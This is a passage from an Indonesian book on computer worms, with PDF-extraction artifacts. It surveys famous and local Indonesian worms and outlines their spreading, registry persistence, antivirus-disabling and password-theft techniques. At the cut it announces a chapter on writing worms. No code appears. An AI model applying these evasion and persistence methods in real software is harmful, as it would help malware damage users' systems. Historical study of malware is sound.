layar monitor (digambar dengan menggunakan bahasa script yang
disebut Rexx), tetapi worm tersebut juga mengirimkan salinan dirinya
dengan menggunakan nama user kepada setiap nama yang ada pada
daftar e-mail penerima, sehingga penerima percaya bahwa e-mail yang
dikirimkan tersebut adalah benar dari user yang dikenal dan bersedia
membukanya.
2.5.2 MORRIS
Pada tanggal 2 Nopember 1988, worm Morris yang terkenal pada
waktu itu berhasil melumpuhkan 6.000 komputer dalam beberapa jam.
Worm tersebut dibuat oleh seorang siswa Cornell, Robert Morris Jr.
Kemudian diadakan penyelidikan, sampai akhirnya Morris dijatuhkan
hukuman pada tahun 1990.
Kesimpulan yang diperoleh adalah motivasi dalam menulis worm
tersebut tidak diketahui dan worm tidak diprogram untuk sengaja
melakukan pengrusakan, tetapi kerusakan yang ditimbulkan disebab-
kan oleh kecelakaan dan kesalahan pemrograman.
Dibulan Oktober 1989, muncul sebuah worm bernama WANK (Worms
Against Nuclear Killers) yang tampaknya belajar dari worm Morris dan
melakukan penularan pada komputer VMS pada DECNet. Worm ini
18
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
menyebar dengan memanfaatkan e-mail dan mengeksploitasi system
untuk mendapatkan hak akses dengan berusaha mencari account user
name dan password.
2.5.3 HAPPY99
Pada bulan Januari 1999, worm happy99 menyebar lewat e-mail dengan
attachment sebuah fle aplikasi bernama happy99.exe. Ketika fle terse-
but dieksekusi tampil gambar kembang api untuk memperingati tahun
baru 1999, tetapi secara diam-diam memodifkasi fle WSOCK32.DLL
(fle system untuk koneksi internet) dengan suatu program trojan horse
yang mengijinkan worm tersebut menyisipkan dirinya pada proses
komunikasi internet, sementara fle WSOCK32.DLL yang asli diubah
kembali namanya menjadi WSOCK32.SKA
2.5.4 MELISA
Di bulan Maret 1999, sebuah virus macro "Melisa"
kembali meresahkan pengguna internet dengan
menginfeksi 100.000 unit komputer hanya dalam
waktu tiga hari.
Virus tersebut memulai penyebarannya dengan
pengiriman perdana ke Usenet Newsgroup "alt.sex"
yang menjanjikan account name berikut password
untuk dapat mengakses sebuah situs erotis. Sebuah
perusahaan antivirus Norton menyebutkan bahwa virus ini adalah
penggabungan antara worm dan virus.
Mellisa menyertakan sebuah fle attachment berupa fle dokumen
Word yang terinfeksi. Ironisnya saat itu masih banyak yang percaya
bahwa dengan membuka sebuah e-mail tidak dapat menginfeksi se-
buah komputer.
Ketika macro tersebut tereksekusi oleh aplikasi Word. Pertama kali
yang dilakukannya adalah melakukan pemeriksaan apakah versi
aplikasi Word yang digunakan bisa diinfeksi, jika bisa maka virus akan
mengurangi pengaturan keamanan pada aplikasi Word untuk mence-
gah aplikasi menampilkan pesan atau peringatan tentang adanya suatu
macro, yang akan mencurigakan user.
11
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
Virus kemudian mencari sebuah key pada registry yang mengandung
kata "kwyjibo", apabila key tersebut tidak ditemukan, virus akan
mengeksekusi aplikasi Outlook dan berusaha mengirimkan salinan
dirinya kepada 50 penerima yang ada pada address book (buku alamat)
aplikasi Outlook. Sebagai tambahan virus menulari fle template
aplikasi Word "normal.dot" menggunakan ftur VBA macro "Auto
Execute", fle dokumen yang berasal dari fle template tersebut akan
membawa serta virus tersebut.
2.5.5 PRETTY PARK
Sebuah worm lainnya menyebar
luas dimusim panas tahun 1999.
Worm yang dinamakan "Pretty-
Park" ini menyertakan attachment
berupa fle "Pretty Park.exe". Tidak ada penjelasan pada attachment,
hanya saja fle tersebut menggunakan icon bergambar seekor beruang,
yang merupakan sebuah karakter pada suatu pertunjukan televisi
"South Park".
Jika dieksekusi, worm menginstal dirinya ke direktori System Windows
dan memodifkasi registry yang membuat worm tersebut aktif saat fle
ber-ekstensi "exe" apa saja dieksekusi. Hal ini menjadi permasalahan
bagi program antivirus, yang tentunya juga ber-ekstensi "exe".
Worm juga mengirimkan salinan dirinya pada alamat e-mail yang
ada pada buku alamat Windows. Pretty Park kemudian berusaha
mengirimkan beberapa data system dan password pada sebuah server
IRC (internet relay chat) tertentu, terakhir dilaporkan bahwa worm ini
memasang suatu backdoor.
2.5.6 EXPLORE ZIP
Pada bulan Juni tahun 1999, muncul sebuah worm bernama "ExploreZip"
yang menyamar sebagai fle zip (fle terkompresi) dalam attachment
sebuah e-mail yang jika dieksekusi akan menampilkan pesan kesala-
han. ExploreZip secara diam-diam menyalin dirinya kedalam direktori
System Windows dan memodifkasi registry.
15
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
Seperti worm lainnya, ExploreZip juga melakukan penyebaran lewat
e-mail dengan memanfaatkan aplikasi Outlook atau Exchange, dengan
mengawasi e-mail yang masuk dan membalas e-mail tersebut dengan
salinan dirinya.
pada tanggal 9 Januari 2003 ExploreZip kemudian dilaporkan meng-
hasilkan varian baru. Varian ini bernama ExploreZip.N varian dan cu-
kup merepotkan pengguna komputer di Indonesia. Salah satu metode
penyebarannya menggunakan e-mail yang memiliki attachment berupa
fle ZIPPED_FILES.EXE saat fle ini dieksekusi maka worm menginstal
dirinya sendiri pada system Windows.
Worm ini meng-overwrite (menimpa) fle dokumen dengan ekstensi
DOC (Microsoft Word), XLS (Microsoft Excel), PPT (Microsoft Power-
point), ASM (Assembler), CPP (C++), C (File C), H (Header C) sehingga
fle-fle tersebut sulit untuk diselamatkan.

2.5.7 BUBBLE BOY
Awal tahun 2000, muncul sebuah virus yang membawa sebuah konsep
baru "BubbleBoy". Virus ini menunjukkan bahwa sebuah komputer
dapat tertular hanya dengan melihat e-mail, tanpa harus membuka
pesannya.
Virus ini mengambil keuntungan dengan adanya celah keamanan pada
aplikasi Internet Explorer, yang secara otomatis mengeksekusi script
Visual Basic yang terdapat pada body e-mail. Virus akan datang sebagai
sebuah e-mail dengan subjek "BubbleBoy is back", pesan berbentuk fle
HTML dan mengandung script virus dalam bahasa Visual Basic.
Jika menggunakan aplikasi Outlook, script tersebut akan dijalankan
walaupun yang dilakukan hanya preview. File tersebut akan ditambah-
kan pada direktori StartUp Windows, sehingga apabila komputer
dihidupkan virus akan berusaha mengirimkan dirinya pada setiap
alamat yang ada pada address book aplikasi Outlook. Diwaktu yang
hampir bersamaan, worm "KAK" tersebar dengan cara yang serupa.
18
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
2.5.8 LOVE LETTER
Dibulan Mei 2000, lajunya penyebaran worm "LoveLetter" menun-
jukkan efektiftas serangan dengan metode social engineering, yang
hingga saat ini sudah menjadi suatu kebiasaan suatu worm dalam
penyebarannya.
E-mail yang berisi worm ini memiliki subjek "I Love You" yang berarti
"Saya Cinta Kamu" dan berisi pesan-pesan yang mendorong user untuk
mengeksekusi attachment yang merupakan worm tersebut. File attach-
ment berupa Visual Basic Script yang bisa dieksekusi dengan Windows
Script Host (bagian dari Windows98, Windows2000, Internet Explorer
5, atau Outlook 5).
Ketika dieksekusi, LoveLetter menginstal dirinya kedalam direktori
System Windows dan memodifkasi registry untuk memastikan bahwa
worm akan aktif saat komputer dihidupkan. Ketika komputer lainnya
terinfeksi, dan jika aplikasi Outlook terinstal pada komputer tersebut,
maka worm akan mengirimkan salinannya pada siapa saja yang ada
pada address book aplikasi Outlook.
Sebagai tambahan worm akan membuat koneksi IRC dan mengirimkan
salinan dirinya pada siapa saja yang bergabung pada saluran IRC terse-
but. LoveLetter juga memiliki kemampuan untuk mencuri password.
Dengan mengubah home page (alamat url yang akan diakses pertama
kalinya) pada Internet Explorer ke suatu website di Asia, worm akan
mengusahakan agar suatu trojan horse di download dari website
tersebut, dimana trojan horse tersebut akan mengumpulkan password
e-mail dan mengirimkannya ke suatu alamat di Asia.
2.5.9 HYBRIS
Dibulan Oktober 2000, worm Hybris menyebar dengan e-mail ber-
attachment. Jika dieksekusi akan memodifkasi fle WSOCK32.DLL
dalam rangka menjejaki semua lalu lintas ber-internet. Untuk setiap
e-mail yang terkirim worm akan mengirimkan salinan dirinya ke
alamat penerima yang sama. Yang menarik dari worm ini yaitu; bisa
men-download fle update untuk dirinya sendiri dari newsgroup "alt.
comp.virus" metode yang digunakan termasuk canggih dan sangat
berbahaya karena payload worm tersebut bisa diubah kapan saja.
1I
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
2.5.10 ANNA KOURNIKOVA
Pada bulan Februari 2001, kembali sebuah worm mencemaskan para
pengguna internet, yang memanfaatkan kepopuleran
seorang petenis asal Rusia "Anna Kournikova". Worm
ini dibawa dalam suatu attachment e-mail yang
menyatakan bahwa lampiran tersebut adalah fle
gambar dalam bentuk fle jpg yang memuat foto
pemain tenis tersebut. Apabila fle tersebut
dieksekusi maka akan mengirimkan salinan
dirinya kepada setiap nama yang terdaftar
pada buku alamat Microsoft Outlook.
2.5.11 SADMIND
Pada bulan Mei 2001, worm Sadmind menyebar dengan mentargetkan
2 vulnerability (kelemahan) pada 2 sistem operasi yang berbeda, dan
menjadi teladan untuk worm berikutnya yang bisa melakukan serangan
dengan berbagai kombinasi. Pertama kali yang dilakukannya adalah
meng-eksploitasi vulnerability buffer overfow pada sistem operasi
Sun Solaris, dan menginstal suatu program agar bisa melakukan
komunikasi dengan IIS webserver guna melakukan suatu serangan.
Vulnerability ini kemudian diumumkan pada tanggal 18 Juni 2001,
yang menunjuk sebagai vulnerability pada Index Server ISAPI.

2.5.12 CODE RED
Memanfaatkan vulnerability pada Index Server ISAPI tersebut, pada
tanggal 12 Juli 2001 muncul sebuah worm dengan nama "Code Red"
yang menyerang semua IIS webserver, dengan aksi mengubah tampi-
lan awal website pada server yang tertular.
Pertama kali worm menginstal dirinya pada system, membaca IP
system dan dari IP tersebut worm menyusun 99 IP baru, kemudian
melakukan pemeriksaan sistem operasi pada IP yang berhasil disusun-
Jika worm menemukan sebuah IP target menggunakan sistem operasi
18
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
Microsoft Windows maka worm akan meng-eksploitasi server target
tersebut, dan melakukan deface (mengubah halaman awal suatu web-
site) dengan tampilan "Welcome to the www.worm.com ! hacked by
Chinese!."
Berikutnya worm mencari fle c:\notworm. Worm tidak akan meng-
hentikan serangannya jika fle tersebut tidak ditemukan. Pada tanggal
20 Juli worm akan melakukan serangan DOS (denial of service) pada
server www.whitehouse.gov, kemudian pada tanggal 27 worm mem-
buat dirinya dalam kondisi dormant (fase saat worm menjadi tidak
aktif) secara permanen.
Tidak begitu lama pada tanggal 19 Juli 2001, muncul Code Red I yang
merupakan versi kedua dari worm Code Red dengan penyebaran yang
lebih cepat. Banyak perbaikan pada program worm sehingga mampu
menginfeksi 359.000 unit komputer hanya dalam waktu 14 jam, seperti
versi pertama worm ini juga membuat dirinya dalam kondisi dormant
pada tanggal 20 Juli secara permanen.
Di bulan Agustus 2001, kembali Code Red muncul dengan versi ber-
beda "Code Red II", muncul dengan payload yang sangat berbahaya.
Worm ini masih memanfaatkan vulnerability yang sama dengan versi
sebelumnya, sedikit perubahan pada program, worm ini akan mem-
buat suatu trojan "explorer.exe" dan ditempatkan pada direktori root.
2.5.13 NIMDA
Tanggal 18 September 2001, worm Nimda adalah worm yang termasuk
paling banyak menginfeksi komputer di Indonesia, muncul dengan
memuat payload yang sangat berbahaya dan menggunakan beragam
cara dalam penyebarannya, pada 12 jam pertama saja worm ini sudah
berhasil menginfeksi 450.000 unit komputer, dan dalam dua hari Nimda
berhasil menginfeksi 2,2 juta komputer serta menyebabkan kerugian
sebesar US $ 370 juta.
Walaupun worm ini tidak menggunakan metode baru dalam penye-
barannya, tetapi dengan penggabungan beberapa metode dalam suatu
worm, menunjukkan adanya tingkatan baru atas kompleksitas yang
tidak terlihat sebelumnya. Nimda melakukan penyebaran dengan
mengirimkan salinan dirinya melalui e-mail dengan subjek random
(acak) dan sebuah fle attachment "readme.exe".
18
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
Nimda memanfaatkan celah keamanan pada Internet Explorer dan
Outlook Express 5.01 dan 5.5 Service Pack 1, dimana e-mail yang
dikirimkan Nimda berupa halaman html yang memiliki body script
tertentu dengan tujuan akan secara otomatis mengaktifkan fle attach-
ment walaupun e-mail tersebut hanya dilihat pada preview pane saja.
Bila komputer terinfeksi berada dalam suatu jaringan maka secara oto-
matis Nimda mencari direktori yang di sharing dari komputer lain dan
memberikan hak tulis penuh (full access) kemudian membuat salinan
dirinya ke dalam direktori-direktori tersebut, dengan mengambil nama
fle secara random pada daftar fle yang ada pada komputer terinfeksi,
dengan menggunakan ekstensi EML atau NWS.
Pada server yang terinfeksi, fle-fle halaman web akan disisipkan script
baru yang secara otomatis mengakses fle readme.eml saat halaman
web tersebut dibuka. Dalam penyebarannya, Nimda juga memanfaat-
kan backdoor pada server yang terinfeksi CodeRed2 atau Sadmind.
Banyaknya perubahan pada fle system dan registry membuat worm
ini sulit untuk dibersihkan.
2.5.14 BADTRANS.B
Pada bulan November 2001, BadTrans kembali beraksi setelah kemun-
culan perdananya pada tanggal 12 April 2001 dengan teknik yang lebih
canggih dan bisa dikatakan sebagai era baru dalam social engineering.
BadTrans.B memeriksa direktori inbox pada aplikasi Outlook dengan
mencari e-mail yang belum dibuka oleh user, kemudian membalas
e-mail tersebut dengan fle attachment berupa salinan dirinya sendiri.
Seperti Nimda, e-mail yang dikirimkan berupa halaman html dan se-
cara otomatis mengaktifkan fle attachment walaupun e-mail tersebut
hanya dilihat pada preview pane saja. Pada proses pengiriman e-mail
BadTrans.B menambahkan underscore (tanda garis bawah) "_" disetiap
awal alamat pengirim, sehingga apabila e-mail tersebut di-reply (balas)
maka e-mail balasan tersebut tidak akan sampai pada alamatnya.
BadTrans.B akan menginstal suatu program trojan yang akan mencuri
user name dan password kemudian mengirimkannya pada suatu
alamat e-mail tertentu, dilaporkan worm ini mengakibatkan kerugian
sebesar US $ 210 juta.
t0
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
2.5.15 KLEZ
Worm Klez muncul di bulan Oktober 2001, seperti worm lainnya worm
ini pun menggunakan kelemahan IE dan OE sehingga worm tereksekusi
dengan sendirinya walau hanya dilihat pada preview pane saja.
Klez hanya menggunakan sarana e-mail dalam penyebarannya. Klez
menyatukan suatu keunikan dengan pendekatan sosial yang inovatif,
dengan memilih salah satu alamat e-mail yang ada pada komputer
terinfeksi dan menggunakan alamat tersebut sebagai alamat pengirim,
kemudian mengirimkan salinan dirinya ke seluruh alamat e-mail yang
lain. Dengan cara ini terlihat, seolah-olah e-mail dikirim oleh seseorang
yang benar-benar dikenal oleh penerima.
Tanggal 11 Nopember 2001, dilaporkan kembali varian lain dari worm
tersebut. Klez.d memiliki rutin baru yang akan memeriksa database
alamat e-mail dari pengguna ICQ sebagai target pengiriman. Saat
dieksekusi worm menginstal dirinya kedalam direktori System Win-
dows dengan nama fle "WinSvc.exe" dan melakukan modifkasi pada
registry sehingga worm akan aktif saat komputer dihidupkan.
Varian lainnya muncul dengan nama Klez.e dan dilaporkan pada
tanggal 17 Januari 2002. Saat dieksekusi worm akan menginstal dirinya
kedalam direktori System Windows dengan nama fle "WINK???.EXE",
dimana ??? adalah variabel random berupa angka 2 dan 3. Seperti Klez.
d worm ini juga memodifkasi registry dengan alasan yang sama,
Selain itu worm ini juga telah dipersenjatai dengan pembunuh pro-
gram antivirus yang bisa mendeteksi Nimda, Code Red, Sircam dan
Fun Love.
Pada varian selanjutnya, e-mail tidak hanya terlihat berasal dari seorang
teman tetapi klez menyisipkan sebuah tool "imunitas" sebagai attach-
ment dan penerima diajarkan untuk menon-aktifkan antivirus mereka
agar bisa menjalankan tool tersebut, dengan mengikuti petunjuk terse-
but, dan saat attachment tersebut dieksekusi maka sebenarnya user
malah menginstal Klez serta virus ElKern pada komputer mereka.
Klez merupakan salah satu worm yang memiliki siklus hidup ter-
panjang, yang pernah mengacaukan dunia internet. Pertama kali
dilaporkan pada bulan Oktober 2001, dan mendominasi pada tahun
2002 sebagai worm yang paling lazim di internet.
t1
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
Akhir tahun 2003 kembali dilaporkan varian Klez.H sebagai ancaman,
walaupun sukar menentukan besar kerugian yang ditimbulkan, tetapi
diperkirakan Klez dan varian-nya menimbulkan kerugian sebesar US
$ 9 milyar.
2.5.16 SLAMMER
Serangan worm Slammer dimulai pada tanggal 23 Januari 2003, worm
yang hanya berukuran 369 byte ini menjadikan Slammer sebagai worm
dengan ukuran terkecil yang pernah ada. Cara kerja worm ini hampir
sama dengan CodeRed, dan tidak memodifkasi registry.
Slammer memanfaatkan vulnerability yang ditemukan oleh Next
Generation Security Software Limited pada bulan Juli 2002 dimana
dengan memanfaatkan vulnerability ini, penyerang dapat menguasai
SQL Server dan kode pemrograman yang berhasil dimasukkan akan
berjalan sebagai system karena hak dari MS SQL Server di dalam
komputer adalah system. Worm ini bukan merupakan mass mailer dan
hanya menyebarkan dirinya melalui scanning port 1434.
2.5.17 BAGLE
Di minggu ketiga Januari 2004, sebuah worm yang disinyalir berasal
dari Jerman ternyata sukses meraih peringkat pertama sebagai worm
yang paling banyak dihentikan. Worm yang kemudian diketahui ber-
nama Bagle ini memiliki siklus hidup yang tergolong singkat, Bagle
memasuki fase dormant secara permanen pada tanggal 28 Januari 2004
dan berusaha untuk menghapus fle launcher-nya.
Bagle memiliki ukuran fle sebesar 15 Kb, dan melakukan penyebaran
dengan cara mengirimkan fle infector melalui e-mail ber-attachment,
dengan tujuan pengiriman yang dikoleksi dari fle-fle berekstensi txt,
htm, html dan wab pada sistem lokal.
Saat fle infector dieksekusi, Bagle membuat salinan fle worm pada
direktori System Windows, kemudian memanipulasi registry agar
worm tereksekusi setiap kali Windows startup.
tt
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
2.5.18 NETSKY
Tidak begitu lama setelah kemunculan worm Bagle, sebuah worm
lainnya menyebar dengan kecepatan yang lebih tinggi. Worm Netsky
melakukan penyebaran dengan cara yang sama seperti yang dilakukan
worm Bagle, hanya saja Netsky memiliki beberapa rutin yang memung-
kinkan dirinya dapat melakukan penyebaran dengan menggunakan
media aplikasi peer to peer.
Netsky mengirimkan salinan dirinya melalui sebuah e-mail ber-attach-
ment dan dalam bentuk fle terkompresi. File worm berukuran sebesar
22 Kb dan menggunakan icon yang disamarkan sehingga terlihat
sebagai sebuah fle dokumen Microsoft Word.
Saat fle infector dieksekusi Netsky membuat salinan fle worm pada
direktori Windows dengan nama fle 'services.exe’, kemudian me-
manipulasi beberapa nilai registry yang bertujuan agar worm dapat
tereksekusi setiap kali Windows startup.
t.8 P|8K|H8âN0âN N08H |0Kâ|
Berikut ini beberapa catatan singkat tentang worm lokal yang pernah
ada dan dibuat oleh worm writer asal Indonesia.
2.6.1 I-WORM PERKASA
Pada bulan 6 Desember 2001 muncul sebuah worm lokal. Worm yang
terkompresi dengan UPX ini memiliki ukuran sebesar 12,288 Kb dan
dibuat dengan menggunakan program Visual Basic.
Worm yang juga disebut dengan nama I-Worm.Imelda atau I-Worm
Updater ini menggunakan media Microsoft Outlook dalam penye-
barannya, saat fle infector dieksekusi worm ini meng-copy dirinya ke
direktori Windows dengan nama 'UPDATE.EXE’, kemudian menam-
bahkan suatu nilai registry pada sub key 'Run’ agar worm ini tetap
aktif saat Windows startup.
t8
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
2.6.2 PESIN
Worm lokal lainnya muncul dipertengahan bulan September 2003
dengan menggunakan icon Microsoft Word. Worm yang terkompresi
dengan ASPack ini juga sering dipanggil dengan sebutan Kenangan,
Puisi Cinta, Hallo, Mistery atau MyHeart. Hal ini disebabkan karena
worm Pesin menggunakan nama-nama tersebut sebagai nama dari fle
infector.
Worm Pesin menggunakan media disket dalam proses penyebaran, hal
ini sangat efektif mengingat penggunaan disket masih sangat diminati
oleh pengguna komputer di Indonesia.
Saat fle infector dieksekusi worm ini meng-copy dirinya ke direktori
Windows dengan nama 'SysTask.exe’, Pesin juga membuat salinan pada
direktori My Documents dengan nama fle 'MyHeart.exe’ kemudian
menambahkan suatu nilai registry pada sub key 'Run’ agar worm ini
tetap aktif saat Windows startup, yang menarik dari worm ini adalah
worm akan menonaktifkan program Registry Editor jika user berusaha
untuk menjalankannya.
2.6.3 TABARU
Pada awal januari 2005 kembali diketahui sebuah worm lokal yang
membawa-bawa nama pembawa acara Jejak Petualang di TV7 yaitu Ri-
yanni Djangkaru. Worm ini memiliki ukuran fle sebesar 40 Kb dengan
icon yang disamarkan sehingga terlihat seperti fle jpg.
Saat fle infector dieksekusi worm membuat dua fle, yaitu fle
'xpshare.exe’ pada direktori 'C:\!submit’ dan fle 'riyani_jangkaru.exe’
pada root direktori ’C:\’, kemudian menambahkan value 'winloader’
pada registry run yang akan mengaktifkan worm setiap Windows
startup. Hanya saja worm ini baru banyak dikenal pada pertengahan
Juli 2005.
t1
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
2.6.4 KANGEN
Pada pertengahan April 2005,
suatu worm lokal kembali me-
resahkan pengguna komputer,
dengan berbekal refrain lagu
Kangen (Dewa 19) worm ini
sukses menginfeksi ratusan
komputer di Indonesia. Seperti
worm lokal terdahulu, Kangen
juga dibuat dengan Visual Basic,
menggunakan icon Microsoft Word dan melakukan penyebaran lewat
disket, anehnya worm satu ini sama sekali tidak dikompresi .
Saat fle infector dieksekusi worm ini meng-copy dirinya ke direk-
tori System Windows dengan nama 'CCAPPS.EXE’ dengan ukuran fle
sebesar 64 Kb, yang menarik dari worm ini adalah worm akan berusaha
menonaktifkan program Task Manager, MS Confg dan Registry Edi-
tor. Saat buku ini ditulis worm Kangen sudah mencapai varian M.
2.6.5 KUMIS
Diawal bulan Juli 2005, seorang worm writer yang konon terinspirasi
oleh seorang dosennya yang berkumis tebal membuat worm yang ke-
mudian disebut dengan worm Kumis. Worm ini berukuran sebesar
76 Kb dan dikhususkan untuk sistem operasi Windows XP dan Win-
dows Server 2003.
Saat fle infector dieksekusi worm ini membuat salinan dirinya ke
direktori System Windows dengan nama 'username logon.exe’ dimana
username adalah nama user aktif, kemudian memanipulasi registry
agar worm tetap aktif. Menariknya, worm kumis ini akan me-restart
komputer setiap kali Windows startup.
t5
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
2.6.6 DECOIL
Worm Decoil yang juga sering disebut Decoy ini muncul di penghujung
tahun 2005, worm lokal ini menyembunyikan fle dokumen Microsoft
Word dan membuat salinan dengan nama yang persis dengan nama
fle yang disembunyikan.
Saat fle infector dieksekusi worm ini meng-copy dirinya ke direktori
Windows dengan nama 'lExplorer.exe’, pada direktori System Win-
dows dan sub direktori '\i75-d2’ dengan nama fle 'dkernel.exe’. Decoy
tergolong worm dengan ukuran yang sangat besar yaitu sebesar 154 Kb
(besar fle ini setelah dikompres dengan UPX).
2.6.7 RONTOKBRO
Diawal bulan Oktober 2005, pengguna komputer di Indonesia kembali
dikejutkan oleh sebuah worm lokal yang sudah menggunakan smtp
sendiri dalam mengirimkan fle infector-nya dan selektif dalam pemili-
han alamat e-mail target.
Worm yang diisukan sebagai worm lokal ter-anyar yang pernah ada
ini ternyata dibuat dalam bahasa Visual Basic , RontokBro juga
memblokir aplikasi Registry Editor dan memonitor caption pada
aplikasi browser, jika suatu string tertentu ditemukan oleh RontokBro
maka komputer akan di-restart secara otomatis.
2.6.8 NOBRON
Tidak begitu lama setelah kemunculan RontokBro, worm yang ke-
mudian dikenali dengan nama W32/Nobron.A@mm oleh Norman
Virus Control ini berusaha untuk membersihkan system dari worm
RontokBro, Nobron memiliki ukuran fle sebesar 84 Kb. Worm juga
berusaha untuk menonaktifkan aplikasi Registry Editor, MS Confg,
Task Manager dan CMD.
Saat fle infector dieksekusi worm ini meng-copy dirinya ke direktori
System Windows dengan nama 'MsPatch.exe’, selain itu Nobron juga
membuat salinan ke setiap root dari masing-masing drive termasuk
USB Flash Disk dengan nama fle 'foto administrator.exe’.
t8
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
2.6.9 RUNITIS
Pada akhir bulan Nopember 2005, kembali
diketahui sebuah worm lokal dengan ukuran
fle sebesar 164 Kb dan telah dikompres dengan
aplikasi ASPack. Worm ini menggunakan nama
yang diambil dari nama seorang penyanyi dari
Malaysia yaitu Siti Nurhaliza (Runitis jika
dibaca terbalik menjadi Sitinur).
Runitis menggunakan icon Internet Explorer
dalam penyebarannya. Worm ini menghapus
fle program regedit.exe (Registry Editor), msconfg.exe (MS Confg),
wmplayer.exe (Windows Media Player), winamp.exe dan winampa.
exe (Winamp) serta beberapa fle program lainnya kemudian membuat
salinan dirinya dengan nama dan letak yang sama, sehingga user
malah akan menjalankan worm apabila mengeksekusi aplikasi-aplikasi
tersebut.
2.6.10 BLUEFANTASY
Di akhir bulan Januari 2006, sebuah worm lokal bernama BlueFantasy
ikut berlomba dengan worm lainnya, walaupun worm yang berukuran
68 Kb ini tidak melewati proses enkripsi dan kompresi namun Blue-
Fantasy mempertahankan ciri khas worm komputer yang membuat
banyak salinan, dengan cara memonitor direktori aktif dan membuat
salinan pada direktori tersebut.
Saat fle infector dieksekusi BlueFantasy meng-copy dirinya ke direktori
System Windows dengan nama fle 'Win32.com’ dan menggunakan
atribut Hidden, selain itu worm juga membuat salinan pada direktori
Desktop, My Documents, dan StartUp. Kemudian worm memanipulasi
suatu nilai registry yang akan membuat fle worm tetap tereksekusi
saat Windows startup, dan membuat type fle executable seperti exe
dan scr akan terlihat sebagai aplikasi Microsoft Word.
tI
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
2.6.11 ROMDIL
Pertengahan bulan Februari 2006, sebuah worm lokal lainnya muncul
dan dideteksi Norman Virus Control sebagai w32/Romdil, seperti
kebanyakan worm lokal, worm inipun dibuat dengan menggunakan
bahasa Visual Basic.
Worm Romdil memiliki ukuran fle sebesar 40 Kb untuk varian A
dan sebesar 41 Kb untuk varian B, worm ini telah dikompres dengan
menggunakan aplikasi UPX, Selain itu worm ini menggunakan icon
dengan gambar Folder, dan disamarkan sebagai fle aplikasi Windows
Explorer.
Untuk bertahan pada suatu system, Romdil berusaha untuk mencegah
user mengeksekusi aplikasi CMD (command prompt), MS Confg,
Registry Editor, Task Manager, dan beberapa fasilitas Windows seperti
Search dan Run.
2.6.12 MYBRO
Di bulan Maret 2006, sebuah varian lain dari worm RontokBro kembali
di-release dan diperkirakan dibuat dengan menggunakan bahasa C.
MyBro memiliki ukuran fle sebesar 51 Kb dan menggunakan icon
dengan gambar Folder.
Worm MyBro diperkirakan menggunakan / meniru source code worm
yang sudah ada sehingga pola worm tersebut dapat terdeteksi dengan
mudah oleh teknologi SandBox dari Norman Virus Control.
Untuk bertahan pada suatu system, MyBro berusaha untuk mematikan
service antivirus dari Norman, TrendMicro, Norton, McAfee, AVG,
Bit Defender, Panda dan PC Cilin. Selain itu MyBro berusaha untuk
menghapus fle Microsoft Visual Basic Virtual Machine yang akan
menggagalkan proses untuk setiap aplikasi yang dibuat dengan meng-
gunakan bahasa Visual Basic, serta melakukan blocking ke beberapa
situs tertentu.
t8
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
2.6.13 IRCBOT.AQF
Dibuat pada awal tahun 2006 dan mulai dikenal pada bulan April 2006,
worm IRCBot menyebar dengan memuat sebuah pesan yang ditujukan
pada Presiden. Worm yang berasal dari Borneo alias Kalimantan ini ti-
dak berusaha untuk mematikan proses Task Manager ataupun Registry
Editor sebagai metode life defender, namun sebagai gantinya IRCBot
menggunakan metode Watcher yang terbilang masih baru pada awal
tahun 2006, yang akan me-restart komputer jika proses salah satu fle
launcher dimatikan. File worm berukuran 32 Kb dan menggunakan
icon fle dokumen Microsoft Word.
2.6.14 LIGHTMOON
Worm dengan nama sebutan yang bisa memiliki arti sebagai bulan
purnama ini, menyebar dipenghujung April 2006 dengan barisan puisi
yang terinspirasi dari bulan purnama. LightMoon menggunakan icon
folder dan memiliki ukuran fle sebesar 39 Kb, umumnya memiliki
beberapa kesamaan teknik dengan worm lokal lainnya, hanya saja
LightMoon ini akan mengalihkan akses dari fungsi MS Confg, Registry
Editor, Task Manager dan Command Prompt pada fle launcher worm,
sehingga user malah mengeksekusi worm tersebut apabila menjalankan
salah satu fungsi tersebut.
108
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

7
.

W
o
r
m

W
S
a
r
.
1
8â8 I
N08H N8zr.1
Kenapa bab ini ada?
Bab ini adalah salah satu bab inti dari buku ini, yang memuat
tentang cara-cara pembuatan worm. Perlu untuk penulis
ingatkan kembali, bahwa membicarakan masalah pembuatan
suatu worm membutuhkan pemahaman tentang tanggung
jawab moral yang besar, karena worm dapat menimbulkan
kerugian yang sangat besar baik berupa materiil maupun non
materiil. Namun demikian, penulis tetap memberikan trik-trik
